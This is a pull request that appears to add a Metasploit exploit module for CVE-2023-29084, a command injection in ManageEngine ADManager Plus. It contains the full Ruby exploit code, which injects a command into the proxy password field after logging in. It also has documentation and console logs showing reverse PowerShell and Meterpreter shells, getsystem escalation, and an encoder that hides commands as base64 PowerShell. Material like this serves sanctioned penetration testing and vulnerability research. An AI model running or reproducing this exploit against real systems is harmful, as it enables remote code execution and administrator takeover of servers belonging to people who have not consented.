### PR TITLE
Add in CVE-2023-29084 - Zoho ManageEngine ADManager Plus ChangePasswordAction Authenticated Command Injection

### DIFF
--- a/documentation/modules/exploit/windows/http/manageengine_admanager_plus_cve_2023_29084_auth_cmd_injection.md
+++ b/documentation/modules/exploit/windows/http/manageengine_admanager_plus_cve_2023_29084_auth_cmd_injection.md
@@ -11,6 +11,9 @@ running ADManager Plus, which will typically be the local administrator.
 Note that the attacker must be authenticated in order to send requests to `/api/json/admin/saveServerSettings`, 
 so this vulnerability does require authentication to exploit.
 
+As this exploit modifies the HTTP proxy settings for the entire server, one cannot use fetch payloads
+with this exploit, since these will use HTTP connections that will be affected by the change in configuration.
+
 ## Verification Steps
 
 1. Set up a Windows Server target as a domain controller server.

--- a/documentation/modules/exploit/windows/http/manageengine_admanager_plus_cve_2023_29084_auth_cmd_injection.md
+++ b/documentation/modules/exploit/windows/http/manageengine_admanager_plus_cve_2023_29084_auth_cmd_injection.md
@@ -41,34 +41,25 @@ msf6 exploit(windows/http/manageengine_admanager_plus_cve_2023_29084_auth_cmd_in
 
 Module options (exploit/windows/http/manageengine_admanager_plus_cve_2023_29084_auth_cmd_injection):
 
+   Name      Current Setting                Required  Description
+   ----      ---------------                --------  -----------
+   DOMAIN    ADManager Plus Authentication  yes       The domain to log into
+   PASSWORD  admin                          yes       The password to log in with
+   Proxies                                  no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS    192.168.64.149                 yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT     9090                           yes       The target port (TCP)
+   SSL       false                          no        Negotiate SSL/TLS for outgoing connections
+   USERNAME  admin                          yes       The user to log into ADManager Plus as
+   VHOST                                    no        HTTP server virtual host
+
+
+Payload options (cmd/windows/powershell/meterpreter/reverse_tcp):
+
    Name      Current Setting  Required  Description
    ----      ---------------  --------  -----------
-   PASSWORD  admin            yes       The password to log in with
-   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
-   RHOSTS    192.168.64.137   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
-   RPORT     8080             yes       The target port (TCP)
-   SSL       false            no        Negotiate SSL/TLS for outgoing connections
-   SSLCert                    no        Path to a custom SSL certificate (default is randomly generated)
-   URIPATH                    no        The URI to use for this exploit (default is random)
-   USERNAME  admin            yes       The user to log into ADManager Plus as
-   VHOST                      no        HTTP server virtual host
-
-
-   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
-
-   Name     Current Setting  Required  Description
-   ----     ---------------  --------  -----------
-   SRVHOST  192.168.64.128   yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
-   SRVPORT  8080             yes       The local port to listen on.
-
-
-Payload options (cmd/windows/powershell_reverse_tcp):
-
-   Name          Current Setting  Required  Description
-   ----          ---------------  --------  -----------
-   LHOST         192.168.64.128   yes       The listen address (an interface may be specified)
-   LOAD_MODULES                   no        A list of powershell modules separated by a comma to download over the web
-   LPORT         8899             yes       The listen port
+   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST     192.168.64.128   yes       The listen address (an interface may be specified)
+   LPORT     8899             yes       The listen port
 
 
 Exploit target:
@@ -88,23 +79,47 @@ msf6 exploit(windows/http/manageengine_admanager_plus_cve_2023_29084_auth_cmd_in
 [+] The target is running AdManager Plus build 7151!
 [+] The target appears to be vulnerable. Target appears to be running a vulnerable version of AdManager Plus!
 [+] Logged in successfully!
-[*] Powershell session session 2 opened (192.168.64.128:8899 -> 192.168.64.137:52930) at 2023-05-23 13:34:34 -0500
-[*] Stopping exploit/multi/handler
+[*] Sending stage (175686 bytes) to 192.168.64.149
+[*] Meterpreter session 3 opened (192.168.64.128:8899 -> 192.168.64.149:57276) at 2023-05-25 15:32:08 -0500
 [+] Request timed out. Its likely the payload executed successfully!
 
-PS C:\Program Files\ManageEngine\ADManager Plus\bin> whoami    
-daforest\administrator
-PS C:\Program Files\ManageEngine\ADManager Plus\bin> background
+meterpreter > getuid
+Server username: DAFOREST\Administrator
+meterpreter > getprivs
 
-Background session 2? [y/N]  y
-msf6 exploit(windows/http/manageengine_admanager_plus_cve_2023_29084_auth_cmd_injection) > sessions
+Enabled Process Privileges
+==========================
 
-Active sessions
-===============
+Name
+----
+SeBackupPrivilege
+SeChangeNotifyPrivilege
+SeCreateGlobalPrivilege
+SeCreatePagefilePrivilege
+SeCreateSymbolicLinkPrivilege
+SeDebugPrivilege
+SeDelegateSessionUserImpersonatePrivilege
+SeEnableDelegationPrivilege
+SeImpersonatePrivilege
+SeIncreaseBasePriorityPrivilege
+SeIncreaseQuotaPrivilege
+SeIncreaseWorkingSetPrivilege
+SeLoadDriverPrivilege
+SeMachineAccountPrivilege
+SeManageVolumePrivilege
+SeProfileSingleProcessPrivilege
+SeRemoteShutdownPrivilege
+SeRestorePrivilege
+SeSecurityPrivilege
+SeShutdownPrivilege
+SeSystemEnvironmentPrivilege
+SeSystemProfilePrivilege
+SeSystemtimePrivilege
+SeTakeOwnershipPrivilege
+SeTimeZonePrivilege
+SeUndockPrivilege
 
-  Id  Name  Type                Information                      Connection
-  --  ----  ----                -----------                      ----------
-  2         powershell windows  Administrator @ WIN-E72FSF87GO1  192.168.64.128:8899 -> 192.168.64.137:52930 (192.168.64.137)
-
-msf6 exploit(windows/http/manageengine_admanager_plus_cve_2023_29084_auth_cmd_injection) > 
+meterpreter > getsystem
+...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
+meterpreter > 
 ```

--- a/documentation/modules/exploit/windows/http/manageengine_admanager_plus_cve_2023_29084_auth_cmd_injection.md
+++ b/documentation/modules/exploit/windows/http/manageengine_admanager_plus_cve_2023_29084_auth_cmd_injection.md
@@ -1,0 +1,110 @@
+## Vulnerable Application
+ManageEngine ADManager Plus prior to build 7181 is vulnerable to an authenticated command injection due to insufficient
+validation of user input when performing the `ChangePasswordAction` function before passing it into a string that is later
+used as an OS command to execute. 
+
+By making a POST request to `/api/json/admin/saveServerSettings` with a `params` POST
+parameter containing a JSON array object that has a `USERNAME` or `PASSWORD` element containing a 
+carriage return and newline, followed by the command the attacker wishes to execute, an attacker can gain RCE as the user
+running ADManager Plus, which will typically be the local administrator. 
+
+Note that the attacker must be authenticated in order to send requests to `/api/json/admin/saveServerSettings`, 
+so this vulnerability does require authentication to exploit.
+
+## Verification Steps
+
+1. Set up a Windows Server target as a domain controller server.
+2. Download https://web.archive.org/web/20220926012908if_/https://download.manageengine.com/products/ad-manager/13024552/ManageEngine_ADManager_Plus_64.exe onto the target and run through the setup window, accepting defaults.
+3. Start `msfconsole`
+4. `set RHOST *target IP*`
+5. `set LHOST *local IP address*`
+6. `set SRVHOST *local IP address*` <- This step is optional depending on payload.
+7. `exploit`
+8. You should get a shell back as the local administrator user on the target machine.
+
+## Options
+
+### USERNAME
+Username to log into ADManager Plus as.
+
+### PASSWORD
+Password to log into ADManager Plus with.
+
+### DOMAIN
+Domain to log into ADManager Plus with or `ADManager Plus Authentication`.
+
+## Scenarios
+
+### ManageEngine ADManager Plus Build 7151 on Windows Server 2022
+```
+msf6 exploit(windows/http/manageengine_admanager_plus_cve_2023_29084_auth_cmd_injection) > show options
+
+Module options (exploit/windows/http/manageengine_admanager_plus_cve_2023_29084_auth_cmd_injection):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   PASSWORD  admin            yes       The password to log in with
+   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS    192.168.64.137   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT     8080             yes       The target port (TCP)
+   SSL       false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                    no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                    no        The URI to use for this exploit (default is random)
+   USERNAME  admin            yes       The user to log into ADManager Plus as
+   VHOST                      no        HTTP server virtual host
+
+
+   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SRVHOST  192.168.64.128   yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT  8080             yes       The local port to listen on.
+
+
+Payload options (cmd/windows/powershell_reverse_tcp):
+
+   Name          Current Setting  Required  Description
+   ----          ---------------  --------  -----------
+   LHOST         192.168.64.128   yes       The listen address (an interface may be specified)
+   LOAD_MODULES                   no        A list of powershell modules separated by a comma to download over the web
+   LPORT         8899             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Windows Command
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(windows/http/manageengine_admanager_plus_cve_2023_29084_auth_cmd_injection) > exploit
+
+[*] Started reverse TCP handler on 192.168.64.128:8899 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is running AdManager Plus build 7151!
+[+] The target appears to be vulnerable. Target appears to be running a vulnerable version of AdManager Plus!
+[+] Logged in successfully!
+[*] Powershell session session 2 opened (192.168.64.128:8899 -> 192.168.64.137:52930) at 2023-05-23 13:34:34 -0500
+[*] Stopping exploit/multi/handler
+[+] Request timed out. Its likely the payload executed successfully!
+
+PS C:\Program Files\ManageEngine\ADManager Plus\bin> whoami    
+daforest\administrator
+PS C:\Program Files\ManageEngine\ADManager Plus\bin> background
+
+Background session 2? [y/N]  y
+msf6 exploit(windows/http/manageengine_admanager_plus_cve_2023_29084_auth_cmd_injection) > sessions
+
+Active sessions
+===============
+
+  Id  Name  Type                Information                      Connection
+  --  ----  ----                -----------                      ----------
+  2         powershell windows  Administrator @ WIN-E72FSF87GO1  192.168.64.128:8899 -> 192.168.64.137:52930 (192.168.64.137)
+
+msf6 exploit(windows/http/manageengine_admanager_plus_cve_2023_29084_auth_cmd_injection) > 
+```

--- a/lib/msf/core/post/windows.rb
+++ b/lib/msf/core/post/windows.rb
@@ -15,4 +15,26 @@ module Msf::Post::Windows
     string.gsub!(' ', '" "') if spaces
     string
   end
+
+  # Escape a string literal value to be included as an argument to powershell.exe.
+  # This will help in cases where one might need to use & as in PowerShell this is
+  # a reserved character whereas in cmd.exe this is used to indicate the start
+  # of an additional command to execute.
+  #
+  # Example (without this escaping):
+  # powershell -Command "cmd /c echo hello & echo world" <- This will result in errors as & is a reserved character.
+  # powershell -Command "cmd.exe /c 'echo hello & echo world'" <- This will succeed as & is interpreted as part of a string by PowerShell.
+  #
+  # In our case we use PowerShell quoting as described at https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_quoting_rules?view=powershell-7.3
+  # which states that to use a single quote inside of a single quoted string, use a second consecutive single quote.
+  # Therefore this is valid in PowerShell: 'don''t'
+  # Which in turn becomes the string "don't" (sans double quotes) inside PowerShell.
+  #
+  # @param string [String] The string to escape for use with powershell.exe.
+  # @return [String] The escaped string.
+  def self.escape_powershell_literal(string)
+    string = string.dup
+    string.gsub!("'", "''")
+    string
+  end
 end

--- a/modules/encoders/cmd/powershell_base64.rb
+++ b/modules/encoders/cmd/powershell_base64.rb
@@ -45,6 +45,17 @@ class MetasploitModule < Msf::Encoder
   end
 
   def encode_buf(buf)
+    # From https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_quoting_rules?view=powershell-7.3
+    # To include a single quotation mark in a single-quoted string, use a second consecutive single quote. For example:
+    # 'don''t' would be the string "don't" but using single quotes.
+    #
+    # Note that we can't use double quotes here as double quote strings in PowerShell are classed as expandable strings
+    # and we don't want expansion here, as this might cause any potential elements starting with $ to be interpreted
+    # as a variable within the string to be replaced by that variable's value.
+    #
+    # The use of quotes also ensures that we get around the issue with cmd.exe understanding & as a symbol for
+    # "also execute this command", whereas in PowerShell it is a reserved character, so not quoting the string
+    # will result in the & being interpreted by PowerShell and the command failing on an interpretation error in PowerShell itself.
     base64 = Rex::Text.encode_base64(Rex::Text.to_unicode("cmd.exe /c 'start #{buf.gsub("'", "''")} '"))
     cmd = "powershell -w hidden -nop -e #{base64}"
   end

--- a/modules/encoders/cmd/powershell_base64.rb
+++ b/modules/encoders/cmd/powershell_base64.rb
@@ -2,7 +2,7 @@
 # This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
-
+include Msf::Post::Windows
 class MetasploitModule < Msf::Encoder
   Rank = ExcellentRanking
 
@@ -56,7 +56,7 @@ class MetasploitModule < Msf::Encoder
     # The use of quotes also ensures that we get around the issue with cmd.exe understanding & as a symbol for
     # "also execute this command", whereas in PowerShell it is a reserved character, so not quoting the string
     # will result in the & being interpreted by PowerShell and the command failing on an interpretation error in PowerShell itself.
-    base64 = Rex::Text.encode_base64(Rex::Text.to_unicode("cmd.exe /c 'start #{buf.gsub("'", "''")} '"))
+    base64 = Rex::Text.encode_base64(Rex::Text.to_unicode("cmd.exe /c 'start #{Msf::Post::Windows.escape_powershell_literal(buf)} '"))
     cmd = "powershell -w hidden -nop -e #{base64}"
   end
 end

--- a/modules/encoders/cmd/powershell_base64.rb
+++ b/modules/encoders/cmd/powershell_base64.rb
@@ -45,7 +45,7 @@ class MetasploitModule < Msf::Encoder
   end
 
   def encode_buf(buf)
-    base64 = Rex::Text.encode_base64(Rex::Text.to_unicode("cmd.exe /c start #{buf}"))
+    base64 = Rex::Text.encode_base64(Rex::Text.to_unicode("cmd.exe /c 'start #{buf.gsub("'", "''")} '"))
     cmd = "powershell -w hidden -nop -e #{base64}"
   end
 end

--- a/modules/exploits/windows/http/manageengine_admanager_plus_cve_2023_29084_auth_cmd_injection.rb
+++ b/modules/exploits/windows/http/manageengine_admanager_plus_cve_2023_29084_auth_cmd_injection.rb
@@ -1,0 +1,214 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'ManageEngine ADManager Plus ChangePasswordAction Authenticated Command Injection',
+        'Description' => %q{
+          This module exploits CVE-2023-29084, an authenticated command injection vulnerability in the
+          ChangePasswordAction functionality whereby user input is not appropriately validated before being inserted
+          into an string that is later used as a command to execute on the target system.
+
+          By injecting into the USERNAME or PASSWORD fields of the request, an attacker can use this vulnerability
+          to execute code in the context of the user running ManageEngine ADManager Plus, which will typically be
+          the local administrator.
+        },
+        'Author' => [
+          'Simon Humbert', # Disclosure of bug via ZDI
+          'Dinh Hoang', # Aka hnd3884. Writeup and PoC
+          'Grant Willcox', # Metasploit module
+        ],
+        'References' => [
+          ['CVE', '2023-29084'],
+          ['URL', 'https://hnd3884.github.io/posts/CVE-2023-29084-Command-injection-in-ManageEngine-ADManager-plus/'], # Writeup
+          ['URL', 'https://www.zerodayinitiative.com/advisories/ZDI-23-438/'],
+          ['URL', 'https://www.manageengine.com/products/ad-manager/admanager-kb/cve-2023-29084.html'], # Advisory
+        ],
+        'DisclosureDate' => '2023-04-12',
+        'License' => MSF_LICENSE,
+        'Platform' => 'win',
+        'Arch' => [ARCH_X86, ARCH_X64, ARCH_CMD],
+        'Privileged' => true,
+        'Payload' => {
+          'BadChars' => "\x00\x0a\x0d\x22" # Avoid double quotes, aka 0x22, and a few other common bad chars.
+        },
+        'Targets' => [
+          [
+            'Windows Dropper',
+            {
+              'Arch' => [ ARCH_X86, ARCH_X64 ],
+              'Type' => :win_dropper,
+              'CmdStagerFlavor' => :psh_invokewebrequest,
+              'DefaultOptions' => { 'PAYLOAD' => 'windows/x64/meterpreter_reverse_tcp' }
+            }
+          ],
+          [
+            'Windows Command',
+            {
+              'Arch' => ARCH_CMD,
+              'Type' => :win_cmd,
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp' }
+            }
+          ],
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 8080
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+  end
+
+  def login(username, password)
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'j_security_check'),
+      'method' => 'POST',
+      'vars_get' => {
+        'LogoutFromSSO' => 'true'
+      },
+      'vars_post' => {
+        'is_admp_pass_encrypted' => 'false', # Optional but better to keep it in here to match normal request.
+        'j_username' => username,
+        'j_password' => password,
+        'domainName' => 'ADManager Plus Authentication',
+        'AUTHRULE_NAME' => 'ADAuthenticator'
+      },
+      'keep_cookies' => true
+    )
+
+    unless res && (res.code == 302 || res.code == 303)
+      fail_with(Failure::NoAccess, 'Could not log in successfully!')
+    end
+
+    print_good('Logged in successfully!')
+  end
+
+  def check
+    res = send_request_cgi(
+      'uri' => target_uri.path,
+      'method' => 'GET'
+    )
+
+    unless res && res.code == 200 && res.body
+      return CheckCode::Unknown('Browsing to root of website returned a non-200 or empty response!')
+    end
+
+    unless res.body&.match(/\.val\('ADManager Plus Authentication'\)/)
+      return CheckCode::Safe('Target is not running ADManager Plus!')
+    end
+
+    build_number = res.body&.match(/src=".+\.js\?v=(\d{4})"/)
+    unless build_number
+      return CheckCode::Unknown('Home page did not leak the build number via the ?v= parameter as expected!')
+    end
+
+    build_number = build_number[1]
+    print_good("The target is running AdManager Plus build #{build_number}!")
+
+    # Versions 7181 and later are patched, everything prior is vulnerable.
+    target_build = Rex::Version.new(build_number)
+    if target_build >= Rex::Version.new('7181')
+      CheckCode::Safe('Target is running a patched version of AdManager Plus!')
+    elsif target_build < Rex::Version.new('7181')
+      CheckCode::Appears('Target appears to be running a vulnerable version of AdManager Plus!')
+    else
+      CheckCode::Unknown("An unknown error occurred when trying to parse the build number: #{build_number}. Please report this error!")
+    end
+  end
+
+  def exploit
+    res = send_request_cgi(
+      'uri' => target_uri.path,
+      'method' => 'GET',
+      'keep_cookies' => true
+    )
+
+    unless res && res.code == 200
+      fail_with(Failure::UnexpectedReply, 'Home page of target did not respond with the expected 200 OK code!')
+    end
+
+    login('admin', 'admin')
+
+    # We need to do this post login otherwise we will get errors. This also ensures we get updated
+    # cookies post login as these can sometimes change post login process.
+    res = send_request_cgi(
+      'uri' => target_uri.path,
+      'method' => 'GET',
+      'keep_cookies' => true
+    )
+
+    unless res && res.code == 200
+      fail_with(Failure::UnexpectedReply, 'Home page of target did not respond with the expected 200 OK code post authentication!')
+    end
+
+    # Check that we actually got our cookies updated post authentication and visiting the homepage.
+    unless res&.get_cookies&.match(/adscsrf=.*?;.*?;.*?_zcsr_tmp=.*?;/)
+      fail_with(Failure::UnexpectedReply, 'Target did not respond with the expected updated cookies after logging in and visiting the home page.')
+    end
+
+    @csrf_cookie = nil
+    for cookie in @cookie_jar&.cookies
+      if cookie.name == 'adscsrf'
+        @csrf_cookie = cookie.value
+        break
+      end
+    end
+
+    fail_with(Failure::NoAccess, 'Could not obtain adscrf cookie!') if @csrf_cookie.blank?
+
+    if target['Type'] == :win_dropper
+      execute_cmdstager
+    else
+      execute_command(payload.encoded)
+    end
+  end
+
+  def execute_command(cmd, _opts = {})
+    res = send_request_cgi(
+      {
+        'uri' => normalize_uri(target_uri.path, 'api', 'json', 'admin', 'saveServerSettings'),
+        'method' => 'POST',
+        'vars_post' => {
+          'adscsrf' => @csrf_cookie,
+          'params' => create_params_value(cmd)
+        },
+        'keep_cookies' => true
+      }
+    )
+
+    if res && res.code == 200
+      if res.body&.match(/{"isAuthorized":false}/)
+        fail_with(Failure::NoAccess, 'Somehow we became unauthenticated during exploitation!')
+      elsif res.body&.match(/Successfully updated the following settings.*-.*Proxy Settings/)
+        print_warning("Settings successfully changed but the fact that the server responded likely means the payload didn't execute!")
+      else
+        fail_with(Failure::PayloadFailed, 'Was not able to successfully update the settings to execute the payload!')
+      end
+    elsif res.nil?
+      print_good('Request timed out. Its likely the payload executed successfully!')
+    else
+      fail_with(Failure::UnexpectedReply, "Target responded with a non-200 OK code to our saveServerSettings request! Code was #{res.code}")
+    end
+  end
+
+  def create_params_value(cmd)
+    "[{\"tabId\":\"proxy\",\"ENABLE_PROXY\":true,\"SERVER_NAME\":\"localhost\",\"USER_NAME\":\"#{Rex::Text.rand_text_alphanumeric(4..20)}\",\"PASSWORD\":\"#{Rex::Text.rand_text_alphanumeric(4..20)}\\r\\n#{cmd}\",\"PORT\":\"8080\"}]"
+  end
+end

--- a/modules/exploits/windows/http/manageengine_admanager_plus_cve_2023_29084_auth_cmd_injection.rb
+++ b/modules/exploits/windows/http/manageengine_admanager_plus_cve_2023_29084_auth_cmd_injection.rb
@@ -9,7 +9,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   prepend Msf::Exploit::Remote::AutoCheck
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::CmdStager
+  require 'json'
 
   def initialize(info = {})
     super(
@@ -44,11 +44,10 @@ class MetasploitModule < Msf::Exploit::Remote
         'DisclosureDate' => '2023-04-12',
         'License' => MSF_LICENSE,
         'Platform' => 'win',
-        'Arch' => [ARCH_X86, ARCH_X64, ARCH_CMD],
+        'Arch' => [ARCH_CMD],
         'Privileged' => true,
         'Payload' => {
-          'BadChars' => "\x22\x0A\x0B\x0C\x0D\x00[{}]:,", # Avoid double quotes, aka 0x22, and new line and line return characters
-          'Size' => 1600
+          'BadChars' => "\x22\x0A\x0D\x00[{}]:," # Avoid double quotes, aka 0x22, and some other characters that might cause issues.
         },
         'Targets' => [
           [
@@ -178,14 +177,10 @@ class MetasploitModule < Msf::Exploit::Remote
 
     fail_with(Failure::NoAccess, 'Could not obtain adscrf cookie!') if @csrf_cookie.blank?
 
-    if target['Type'] == :win_dropper
-      execute_cmdstager
-    else
-      execute_command(payload.encoded)
-    end
+    execute_command(payload.encoded)
   end
 
-  def execute_command(cmd, _opts = {})
+  def execute_command(cmd)
     res = send_request_cgi(
       {
         'uri' => normalize_uri(target_uri.path, 'api', 'json', 'admin', 'saveServerSettings'),
@@ -216,6 +211,15 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def create_params_value(cmd)
-    "[{\"tabId\":\"proxy\",\"ENABLE_PROXY\":true,\"SERVER_NAME\":\"localhost\",\"USER_NAME\":\"#{Rex::Text.rand_text_alphanumeric(4..20)}\",\"PASSWORD\":\"#{Rex::Text.rand_text_alphanumeric(4..20)}\\r\\n#{cmd}\",\"PORT\":\"8080\"}]"
+    [
+      {
+        tabId: 'proxy',
+        ENABLE_PROXY: true,
+        SERVER_NAME: 'localhost',
+        USER_NAME: Rex::Text.rand_text_alphanumeric(4..20).to_s,
+        PASSWORD: "#{Rex::Text.rand_text_alphanumeric(4..20)}\r\n#{cmd}",
+        PORT: '8080'
+      }
+    ].to_json
   end
 end

--- a/modules/exploits/windows/http/manageengine_admanager_plus_cve_2023_29084_auth_cmd_injection.rb
+++ b/modules/exploits/windows/http/manageengine_admanager_plus_cve_2023_29084_auth_cmd_injection.rb
@@ -51,7 +51,7 @@ class MetasploitModule < Msf::Exploit::Remote
             {
               'Arch' => ARCH_CMD,
               'Type' => :win_cmd,
-              'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp' }
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp' } # cmd/windows/powershell_bind_tcp also works.
             }
           ],
         ],

--- a/modules/exploits/windows/http/manageengine_admanager_plus_cve_2023_29084_auth_cmd_injection.rb
+++ b/modules/exploits/windows/http/manageengine_admanager_plus_cve_2023_29084_auth_cmd_injection.rb
@@ -28,6 +28,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
           Note that the attacker must be authenticated in order to send requests to /api/json/admin/saveServerSettings,
           so this vulnerability does require authentication to exploit.
+
+          As this exploit modifies the HTTP proxy settings for the entire server, one cannot use fetch payloads
+          with this exploit, since these will use HTTP connections that will be affected by the change in configuration.
         },
         'Author' => [
           'Simon Humbert', # Disclosure of bug via ZDI
@@ -66,7 +69,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Notes' => {
           'Stability' => [CRASH_SAFE],
           'Reliability' => [REPEATABLE_SESSION],
-          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES]
+          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES] # We are changing the proxy settings for every HTTP connection on the target server.
         }
       )
     )
@@ -177,17 +180,57 @@ class MetasploitModule < Msf::Exploit::Remote
 
     fail_with(Failure::NoAccess, 'Could not obtain adscrf cookie!') if @csrf_cookie.blank?
 
-    execute_command(payload.encoded)
+    retrieve_original_settings
+
+    begin
+      modify_proxy(create_params_value_enable(payload.encoded))
+    ensure
+      modify_proxy(create_params_value_restore)
+    end
   end
 
-  def execute_command(cmd)
+  def retrieve_original_settings
+    res = send_request_cgi(
+      {
+        'uri' => normalize_uri(target_uri.path, 'api', 'json', 'admin', 'getServerSettings'),
+        'method' => 'POST',
+        'vars_post' => {
+          'adscsrf' => @csrf_cookie
+        },
+        'keep_cookies' => true
+      }
+    )
+
+    unless res && res.code == 200 && res&.body&.match(/ads_admin_notifications/)
+      fail_with(Failure::UnexpectedReply, 'Was unable to get the admin settings for restoration!')
+    end
+
+    json_body = JSON.parse(res.body)
+    server_details = json_body['serverDetails']
+    unless server_details
+      fail_with(Failure::UnexpectedReply, 'Was unable to retrieve the server settings!')
+    end
+
+    server_details.each do |elm|
+      next unless elm['tabId'] == 'proxy'
+
+      @original_port = elm['PORT']
+      @original_password = elm['PASSWORD']
+      @proxy_enabled = elm['ENABLE_PROXY']
+      @original_server_name = elm['SERVER_NAME']
+      @original_user_name = elm['USER_NAME']
+      break
+    end
+  end
+
+  def modify_proxy(params)
     res = send_request_cgi(
       {
         'uri' => normalize_uri(target_uri.path, 'api', 'json', 'admin', 'saveServerSettings'),
         'method' => 'POST',
         'vars_post' => {
           'adscsrf' => @csrf_cookie,
-          'params' => create_params_value(cmd)
+          'params' => params
         },
         'keep_cookies' => true
       }
@@ -199,7 +242,7 @@ class MetasploitModule < Msf::Exploit::Remote
       elsif res.body&.match(/Successfully updated the following settings.*-.*Proxy Settings/)
         print_warning("Settings successfully changed but the fact that the server responded likely means the payload didn't execute!")
       elsif res.body&.match(/"status":"error"/)
-        print_error("The payload somehow triggered an error on the target's side!")
+        print_error("The payload somehow triggered an error on the target's side! Error was: #{res.body}")
       else
         fail_with(Failure::PayloadFailed, 'Was not able to successfully update the settings to execute the payload!')
       end
@@ -210,15 +253,34 @@ class MetasploitModule < Msf::Exploit::Remote
     end
   end
 
-  def create_params_value(cmd)
+  def create_params_value_enable(cmd)
     [
       {
         tabId: 'proxy',
         ENABLE_PROXY: true,
-        SERVER_NAME: 'localhost',
+        SERVER_NAME: 'localhost', # In my experience this worked most reliably.
         USER_NAME: Rex::Text.rand_text_alphanumeric(4..20).to_s,
         PASSWORD: "#{Rex::Text.rand_text_alphanumeric(4..20)}\r\n#{cmd}",
-        PORT: datastore['RPORT']
+        PORT: datastore['RPORT'] # In my experience, setting this to the same PORT as the web server worked reliably.
+      }
+    ].to_json
+  end
+
+  def create_params_value_restore(enable_proxy = nil)
+    if enable_proxy.blank?
+      @proxy_enabled = false
+    else
+      @proxy_enabled = true
+    end
+
+    [
+      {
+        tabId: 'proxy',
+        ENABLE_PROXY: @proxy_enabled,
+        SERVER_NAME: @original_server_name,
+        USER_NAME: @original_user_name,
+        PASSWORD: @original_password,
+        PORT: @original_port
       }
     ].to_json
   end

--- a/modules/exploits/windows/http/manageengine_admanager_plus_cve_2023_29084_auth_cmd_injection.rb
+++ b/modules/exploits/windows/http/manageengine_admanager_plus_cve_2023_29084_auth_cmd_injection.rb
@@ -42,18 +42,10 @@ class MetasploitModule < Msf::Exploit::Remote
         'Arch' => [ARCH_X86, ARCH_X64, ARCH_CMD],
         'Privileged' => true,
         'Payload' => {
-          'BadChars' => "\x00\x0a\x0d\x22" # Avoid double quotes, aka 0x22, and a few other common bad chars.
+          'BadChars' => "\x22\x0A\x0B\x0C\x0D\x00[{}]:,", # Avoid double quotes, aka 0x22, and new line and line return characters
+          'Size' => 1600
         },
         'Targets' => [
-          [
-            'Windows Dropper',
-            {
-              'Arch' => [ ARCH_X86, ARCH_X64 ],
-              'Type' => :win_dropper,
-              'CmdStagerFlavor' => :psh_invokewebrequest,
-              'DefaultOptions' => { 'PAYLOAD' => 'windows/x64/meterpreter_reverse_tcp' }
-            }
-          ],
           [
             'Windows Command',
             {
@@ -198,6 +190,8 @@ class MetasploitModule < Msf::Exploit::Remote
         fail_with(Failure::NoAccess, 'Somehow we became unauthenticated during exploitation!')
       elsif res.body&.match(/Successfully updated the following settings.*-.*Proxy Settings/)
         print_warning("Settings successfully changed but the fact that the server responded likely means the payload didn't execute!")
+      elsif res.body&.match(/"status":"error"/)
+        print_error("The payload somehow triggered an error on the target's side!")
       else
         fail_with(Failure::PayloadFailed, 'Was not able to successfully update the settings to execute the payload!')
       end

--- a/modules/exploits/windows/http/manageengine_admanager_plus_cve_2023_29084_auth_cmd_injection.rb
+++ b/modules/exploits/windows/http/manageengine_admanager_plus_cve_2023_29084_auth_cmd_injection.rb
@@ -17,13 +17,17 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'ManageEngine ADManager Plus ChangePasswordAction Authenticated Command Injection',
         'Description' => %q{
-          This module exploits CVE-2023-29084, an authenticated command injection vulnerability in the
-          ChangePasswordAction functionality whereby user input is not appropriately validated before being inserted
